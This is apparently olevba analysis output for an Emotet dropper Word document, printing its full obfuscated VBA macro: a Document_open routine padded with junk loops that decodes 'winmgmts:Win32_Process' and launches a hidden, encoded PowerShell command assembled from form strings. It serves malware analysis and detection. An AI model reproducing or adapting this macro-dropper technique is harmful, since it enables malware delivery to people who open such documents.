olevba 0.55.2 on Python 2.7.17 - http://decalage.info/python/oletools
===============================================================================
FILE: ../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO Aojplemq.cls 
in file: ../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc - OLE stream: u'Macros/VBA/Aojplemq'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Private Sub Document_open()
   Ltyncvvwo = 234 + 423
   Do While Cikubwvivihv = 1
      Hcmhzkjwdl = 3 * Fqdsyasenoww
      Fnxyeyndusjo = ("Repellendus est quia culpa omnis totam provident quibusdam aut dolorum.")
      For Jffyugqfec = Cgwsgpnie To Fhbicvkijmfvh
         Bnbajuowvggcm = ("Rerum ad nihil vel.")
         Gingzqsy = 223
      Next
      Uuavxkoiio = Elfrlfbvs
Loop
Ewxdqdei
   Ewdbqeofwfve = 234 + 423
   Do While Ucwjhgwmvyh = 1
      Rdkgxjky = 3 * Hscfaewhrzd
      Ynesxsaetxd = ("Qui facilis cumque porro nam sunt eum sed in dolor.")
      For Lzxvhrtl = Favhzrpsxom To Trngalouzizs
         Wrljfjwzrb = ("Velit saepe.")
         Ndffipzh = 223
      Next
      Ulszawfr = Chtalegcvuz
Loop
End Sub
-------------------------------------------------------------------------------
VBA MACRO Jeuwzqvsdrcqz.frm 
in file: ../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc - OLE stream: u'Macros/VBA/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Rgzhzedt.bas 
in file: ../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc - OLE stream: u'Macros/VBA/Rgzhzedt'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function Ypzdgmswtvdol()
   Ecpsjpwmt = 234 + 423
   Do While Iflpcowzdtqob = 1
      Qlrgusoolmu = 3 * Evuphzdzzkfb
      Mnnnndwy = ("Et.")
      For Nqguqadhjbui = Gckorame To Bbxyhbyfjab
         Jiygysjieomg = ("Enim ut vel.")
         Hhkijhrspcfz = 223
      Next
      Oyzzpjbf = Nlzgxmlswiqx
Loop
Ccahqiqatqpii = Aojplemq.Gzuokbkyuug
   Xoxcfslhh = 234 + 423
   Do While Pkocrnurft = 1
      Kkoupcjxomswo = 3 * Llcoewtryqjb
      Bqljpnrrywfxb = ("Autem.")
      For Sroysigd = Cqtqegapan To Nyfcungih
         Ofyvdbnvnganx = ("Ipsa minima aut odit laborum architecto.")
         Upfiaghl = 223
      Next
      Tqotxwchqfk = Xomriamlhe
Loop
Iyufykfdyvmgd = Ccahqiqatqpii + Jeuwzqvsdrcqz.Gshrkbqz + Jeuwzqvsdrcqz.Zomuekcd + Jeuwzqvsdrcqz.Jrgysmbu
   Zcyuqbzhudyk = 234 + 423
   Do While Wvxzhtphlfoe = 1
      Ibunrqdbman = 3 * Aoxboyme
      Vjpfsrtgmsmz = ("In tempora dolor aut amet.")
      For Kskovjxldp = Ndafwiujyeck To Sublrbvoqv
         Jeukgzrzeqfgv = ("Ut facilis sint consequatur et et voluptas.")
         Jkgqadlqc = 223
      Next
      Xmwymfrzzqoo = Skfbpvqn
Loop
Ztivzgiogphbr = Iyufykfdyvmgd + Jeuwzqvsdrcqz.Yiaxbzchth + Jeuwzqvsdrcqz.Xgxatuyc.Tag
   Lhsyghafslbi = 234 + 423
   Do While Letzvixom = 1
      Xdgyuyaelpj = 3 * Hgrkaaarl
      Gdjeewwuxkid = ("Ea et.")
      For Xmadmqbyo = Rnomuxlsorr To Aosoiuycxcdnz
         Uphpromjiicnw = ("Magnam.")
         Pgxecxxnq = 223
      Next
      Ntkkyuimxzkb = Ofkffhbrs
Loop
Ypzdgmswtvdol = Mqqyhrxynq + Ztivzgiogphbr + Mqqyhrxynq
   Yyqtlblmjar = 234 + 423
   Do While Usazcqclwva = 1
      Bvovtqeuu = 3 * Dwiiuaeoe
      Iihvwfbbcqq = ("Quaerat id voluptates quis est.")
      For Pyngajvzaswfh = Wqlyskngoyty To Prmpitwmynup
         Plpplkfme = ("Dicta.")
         Pcryihkdhla = 223
      Next
      Zavjsxectfr = Enincmvatq
Loop
End Function
Function Ewxdqdei()
   Hhahpldlmgytv = 234 + 423
   Do While Bdbvsqpntmg = 1
      Cpsroosgidlmw = 3 * Nxrrvfnk
      Iisthuiee = ("Larry")
      For Ogehjisaqjwkm = Vpltofzmgfamb To Hrygzqmk
         Ujcwmygukzttl = ("Ronnie")
         Puyciwrsobfm = 223
      Next
      Gifyxuvw = Gurqiiogepkv
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Dxztlkebm = 234 + 423
   Do While Ngqkvsvdtavag = 1
      Mvopoxnzbmda = 3 * Vpwvlvkkk
      Xiaghwsmsyin = ("Sint hic officiis vel.")
      For Bagoxrskw = Yfumibldur To Ttpkosinbao
         Evmtdnmdvjry = ("Et.")
         Wwjcpnmnvh = 223
      Next
      Rojjyrkr = Zjqecjxky
Loop
Uqdvmpngkfcs = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Aojplemq.Gzuokbkyuug + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
   Bfmckkwihiaz = 234 + 423
   Do While Aekpydhwj = 1
      Qqwjgipnqlgs = 3 * Kwbemzutb
      Kweanfwvktua = ("Et.")
      For Zllzuuml = Ggsxryxovqw To Mdgkwomqwc
         Nithghznru = ("Sed molestiae libero quam recusandae.")
         Yemwfeiena = 223
      Next
      Nkpwwwkdpldqe = Jxztswtlscq
Loop
Dcnoxqwznm = Join(Uqdvmpngkfcs, "")
   Hxaemhxqqzcle = 234 + 423
   Do While Wwlxqtzpxi = 1
      Chldewgncwp = 3 * Kacgyyjy
      Lbiscihdwutvi = ("Ut impedit nemo eos numquam aliquam sapiente non facere et.")
      For Xoxxkzhptftxi = Ipdizbvedf To Tbkprxkajman
         Momjkzell = ("Consectetur illo asperiores sint.")
         Zfubjusqgnnj = 223
      Next
      Zxyawopj = Hsuuvohpgxs
Loop
Set Gkjpnwxihmxy = GetObject(Dcnoxqwznm)
   Wlyhavvsmu = 234 + 423
   Do While Tpysogzamph = 1
      Bwlmexbp = 3 * Rfqcymry
      Hmzudygckwge = ("Celia")
      For Yzkghwob = Hmxeaovrrp To Xqigryfexnr
         Zckrtggu = ("Commodi ea asperiores.")
         Qabbwapmxgi = 223
      Next
      Xafpvnotukab = Zyiqvidsfp
Loop
Rioscijwwxx = Dcnoxqwznm + Jeuwzqvsdrcqz.Lcgurlihjqe.ControlTipText + Jeuwzqvsdrcqz.Kavzasrckkfrp.ControlTipText
   Ihcumvqfu = 234 + 423
   Do While Bjpnoqgqqibbt = 1
      Vikhgitnanug = 3 * Bvaawtxd
      Hditxgfjruz = ("Qui ab illum.")
      For Ngpiwpatkuno = Bwjusowa To Zqthlosd
         Mthkantu = ("Vanessa")
         Vejfemizgs = 223
      Next
      Dpigvsivbj = Ohpytevbeu
Loop
Jhotvpvvro = Rioscijwwxx + Aojplemq.Gzuokbkyuug
   Dhfwqdskkhs = 234 + 423
   Do While Ocwipifcilro = 1
      Suybjheaymlq = 3 * Zavtdfcn
      Keanuwnivlzqm = ("Eum ratione ut iure aut autem ipsa.")
      For Opodjxyze = Pylppfnzr To Qfczduybi
         Kpqojxblfvl = ("Suscipit eligendi hic beatae.")
         Pxgvucmod = 223
      Next
      Ibktdadttznwz = Qyfaletvjgoch
Loop
Set Ewxdqdei = GetObject(Jhotvpvvro)
   Nucgbbkfmrw = 234 + 423
   Do While Zjyflsijyjq = 1
      Lqajsmkphjybu = 3 * Tysbepbxrmh
      Gokmzcpt = ("Autem ut necessitatibus ut possimus veniam ut.")
      For Yjwarzze = Tqarpdikt To Lwkjsymcrvvnv
         Ipjxsiqigqn = ("Naomi")
         Vufawgmmmryam = 223
      Next
      Kxcfwyvtavqnv = Tefqgxqv
Loop
Ewxdqdei.XSize = False
   Xmdofjmztyom = 234 + 423
   Do While Wztomnceaofqu = 1
      Kcwxgtpgyku = 3 * Yjpnjsiw
      Wbqtlpioockjv = ("Qui rerum consequuntur.")
      For Pehtvdstzfr = Gcbsrdzwqzdq To Frrpoxyunbdw
         Hqouqqima = ("Aspernatur.")
         Ssszeecgimci = 223
      Next
      Btmoapuh = Zliayntrzxv
Loop
Ewxdqdei.YSize = False
   Hgdqfewunrxo = 234 + 423
   Do While Pbpubepsghts = 1
      Tgisphoj = 3 * Encalomdw
      Vaypoeoz = ("Autem eos magni.")
      For Nssahjezfggdg = Bpgsvpvbcyf To Aczkbkru
         Efherdwrtibnp = ("Rudy")
         Airrqcbzb = 223
      Next
      Gvbwytrp = Oldxgglacm
Loop
Do While Gkjpnwxihmxy.Create(KSNNSN & Ypzdgmswtvdol, Ssirbkkvy, Ewxdqdei, Xfvqhbpjicvz)
Loop
   Cjevedjkn = 234 + 423
   Do While Ornzcmqtw = 1
      Edsdgulonr = 3 * Kxbxtdzfqylj
      Pbehyigsfbcb = ("Quasi sequi veritatis perspiciatis.")
      For Yyzojwdcapx = Utfsjmofkkfsv To Ravsgkgrzwzu
         Bokjmmzzjt = ("Quae non ipsa distinctio reprehenderit error autem.")
         Joouvoilka = 223
      Next
      Ilnbgvjrz = Vvjjbssrcd
Loop
End Function

-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Blfiiugou
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Xedtrdnal
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Phopevlvixzdx
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
owershe
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Tahomae
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
ll -w hi
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Tahomahi
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
dden -en xzd
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Tahomahi
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Djqbsatdlhswq
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Tahomahi
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Tahomahi
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Pkqfkivll
-------------------------------------------------------------------------------
VBA FORM STRING IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz/o'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Tahomahi
-------------------------------------------------------------------------------
VBA FORM Variable "Vbzlhmwn" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Blfiiugou
-------------------------------------------------------------------------------
VBA FORM Variable "Kpwsamugrmhq" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Xedtrdnal
-------------------------------------------------------------------------------
VBA FORM Variable "Wimenrfja" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Phopevlvixzdx
-------------------------------------------------------------------------------
VBA FORM Variable "Gshrkbqz" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
owershe
-------------------------------------------------------------------------------
VBA FORM Variable "Zomuekcd" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
ll -w hi
-------------------------------------------------------------------------------
VBA FORM Variable "Jrgysmbu" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
dden -en 
-------------------------------------------------------------------------------
VBA FORM Variable "Lcgurlihjqe" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
None
-------------------------------------------------------------------------------
VBA FORM Variable "Kavzasrckkfrp" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
None
-------------------------------------------------------------------------------
VBA FORM Variable "Cndfmwpqywk" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Djqbsatdlhswq
-------------------------------------------------------------------------------
VBA FORM Variable "Xgxatuyc" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
None
-------------------------------------------------------------------------------
VBA FORM Variable "Yiaxbzchth" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
JAB
-------------------------------------------------------------------------------
VBA FORM Variable "Iafdbyktmoary" IN '../../../emotet/droppers/advisio/SW_8L0D1JPHLHOMWL.doc' - OLE stream: u'Macros/Jeuwzqvsdrcqz'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Pkqfkivll
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
|Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

